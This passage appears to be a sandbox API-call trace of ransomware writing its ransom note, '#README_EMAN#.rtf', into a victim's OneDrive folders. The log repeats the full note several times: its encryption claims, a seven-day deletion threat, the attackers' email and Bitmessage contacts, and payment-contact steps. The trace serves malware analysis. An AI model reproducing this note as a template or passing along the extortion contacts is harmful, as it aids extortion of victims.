th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0298.988] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.989] CloseHandle (hObject=0x27c) returned 1 [0298.989] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\#readme_eman#.rtf")) returned 0xffffffff [0298.989] GetLastError () returned 0x2 [0298.989] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.991] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not 